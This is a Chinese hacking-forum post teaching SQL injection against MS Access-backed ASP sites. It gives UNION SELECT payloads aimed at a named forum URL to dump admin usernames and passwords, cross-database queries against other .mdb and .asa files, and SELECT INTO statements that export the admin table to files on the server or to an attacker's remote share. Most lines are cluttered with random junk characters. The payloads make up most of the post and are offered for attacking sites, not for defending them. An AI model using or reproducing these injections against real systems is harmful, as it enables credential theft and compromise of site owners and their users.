找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2128|回复: 0
打印 上一主题 下一主题

Access高级注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:20:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
--------------------------------------------------------------3 _) j( E% S0 V+ x
union查询法$ r" Z: E* a  i- K4 J4 T! C
首先要说的就是查询办法,一般的查询办法就是: B: B& R6 S( G8 f7 s% _4 H

% q# a* Y& k6 m2 r& |% X程序代码
4 D' z( Y" I7 M3 o: E1 L5 I4 rand 1=(select count(*) from admin where left(id,1)='1')
7 e* w% N. U! P/ N& j
& k0 f: Y) V# H9 h! v3 v2 R) _8 m这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.: K1 q6 O- c  H2 x: ]  w! w! G. _
所以这个时候,union select横空出现.别以为只能在PHP里用哦...8 V& i9 D; e3 E
譬如你有一个ACCESS点:9 d7 Y3 k( v% a* V8 _4 a
程序代码
1 b/ {5 j, Q! @& g& ]0 s/ rhttp://bbs.tian6.com/xiaoyang.asp?coder=1
9 m% w$ s* N, [1 T9 M3 G0 }# R( P. R5 d. X1 K7 t7 d, D
知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),3 b+ x3 S) g: }  J
然后我们直接来:6 r7 y9 l3 ]% e  l
程序代码, [. N, c: a( s
http://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]6 o" |# g- _) H9 j. M; C  U) t
  M2 W; t: o6 E  }8 E* h4 j
这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.
* ?" P$ J) j8 \: T5 _- ^' C+ G" I2 N9 q3 D5 q- m/ L- i& G
, K, P+ F$ W1 [# X/ W
; Z" x5 {) p. H8 V  G
---------------------------------------------------------------3 R' @% u  f5 d% k
Access跨库查询/ z# [7 u4 A9 u
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.
3 [1 x7 H3 b- x0 M8 t跨库的查询语句:8 ]3 d  `" N1 l" H: u
子查询:3 d4 H- {4 x! l3 X8 o! d: Y, h
程序代码. E8 a. t# {0 L; V3 y
and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>04 C6 n( l3 x" G1 |( P! |
9 `8 {8 o  W2 H9 j! d9 R6 i
union查询:3 H& c2 W3 D5 P+ w
程序代码1 u" B8 H# g7 y. U. H- J
union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=10 K+ `2 B9 Q6 a; X' Z
) B# \: p; I8 X! x) X4 `7 ?" G; e8 h
跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:
. H' Y6 e4 \( Q$ H程序代码
4 R' }) Z) [0 n: L3 d# e& c* u! Ohttp://www.4ngel.net/article/46.htm
5 a1 e, y1 `9 G9 L$ c- \  @http://hf110.com/Article/hack/rqsl/200502/66.html
+ ^, ^9 _6 `3 g0 t' o# Z3 s) T* i% D% O. Y& y
---------------------------------------------------------------5 m7 W+ d9 y% `& N
Access注入,导出txt,htm,html1 y$ T& n0 ]7 B; c  O
子查询语句:8 m. q5 w4 Q* x6 ^6 u1 U
程序代码
' ^4 o6 ^. a% n1 {! KSelect * into [test.txt] in 'd:\web\' 'text;' from admin/ V- t" Y! X6 `5 w2 Y8 _
, B. H5 w8 L- X
这样就把admin表的内容以test类型存进了d:\web里面.
# V1 B2 i/ o% N! v0 C8 ^UNION查询:
6 n3 K. R5 Z+ ]* s& m5 V$ {程序代码( u" m( q' h6 B9 h+ z: I5 z$ Q
union select * into [admin.txt] in 'c:\' 'test;' from admin
6 S  z! j% D+ Y  A3 h# P0 W, M- c  M0 O! @; Z
而且这里也可以保存到本地来:3 E3 ?  ~+ y/ k; r1 L8 L0 s
程序代码
2 c+ v( S" I+ U: B+ d6 BSelect * into [test.txt] in '\\yourip\share' 'text;' from admin  E2 c0 C8 m/ V9 N7 e0 d
9 w# c! b  R) h9 G$ \
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:
% K/ u' l$ @0 G/ d9 `; S- |
+ [7 p4 T5 |8 J' J% m" a- t程序代码
; r+ D$ j6 m3 \1 @! Q% Z/ Qhttp://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7
+ A- f" K" q3 c& H7 L- H, r$ ~/ p, \7 G7 J
因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang  asp.asp之类的文件或者目录来导进文件~还是会很强大的.
& O3 ^" _9 |0 H( y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表